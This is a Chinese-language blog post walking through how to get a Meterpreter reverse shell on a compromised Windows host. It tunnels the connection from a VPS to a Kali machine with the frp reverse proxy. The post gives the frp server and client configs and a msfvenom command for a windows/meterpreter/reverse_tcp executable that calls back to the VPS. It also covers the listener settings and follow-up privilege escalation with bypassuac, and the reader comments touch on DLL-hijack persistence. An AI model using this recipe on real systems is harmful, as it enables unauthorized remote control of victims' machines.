美文网首页
frp反向代理+MSF获取shell

frp反向代理+MSF获取shell

作者: Jaky233 | 来源:发表于2021-01-08 22:48 被阅读0次

    0x00:简介

        frp 是一个反向代理工具.可以轻松地进行内网穿透.对外网提供服务,frp支持 tcp协议, http协议, https 等协议类型,并且 web 服务支持根据域名进行路由转发.

    0x01:环境交代

    靶机:x.x.174.171(下面简称靶机)

    kali:192.168.1.106(下面简称kali)

    vps:x.x.193.94(下面简称vps)

        已在靶机中获取到webshell

    0x02:开始反向

    一、在vps中在下载frp并编辑frps.ini

    vim frps.ini
    #frp服务端与客户端连接端口,frps和frpc必须一致bind_port = 7000

    启动frps:./frps -c ./frps.ini

    二、在kali中在下载frp并编辑frpc.ini

    vim frpc.ini
    [common]server_addr = x.x.193.94server_port = 7000        #frpc工作端口,必须和上面frps保持一致[msf]type = tcplocal_ip = 127.0.0.1local_port = 5555          #转发给本机的5555remote_port = 6000         #服务端用6000端口转发给本机

     启动frpc:./frpc -c ./frpc.ini

     

    这里frp反向代理做完了,下面开始MSF马制作与设置监听.

    三、MSF制作马

    msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe

    这里注意一下:

    lport的端口是你frpc.ini里面的remote_port = 6000端口

    四、设置监听、执行msf马

    这里注意一下:

    set lhost 127.0.0.1   #设置监听ip,必须和frpc中的local_ip 一致set lport 5555        #设置监听端口,与frpc中的local_port一致

    到靶机去执行i.exe

    观察vps上的frp

    观察本地的kali

    已获取到shell

    tips:内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权.

    本人最常用的bypassuac模块

    exploit/windows/local/bypassuac
    洛米唯熊 发起了一个读者讨论 大佬们,你们提权是常用哪个模块呢? 精选讨论内容 Leon

    啊d模块

    作者

    kali 里面的阿D最好用

    Aa.Kay

    我用cs的 dll马

    作者

    dll劫持 维持权限,可以可以

    相关文章

      网友评论

          本文标题:frp反向代理+MSF获取shell

          本文链接:https://www.haomeiwen.com/subject/mkgmuktx.html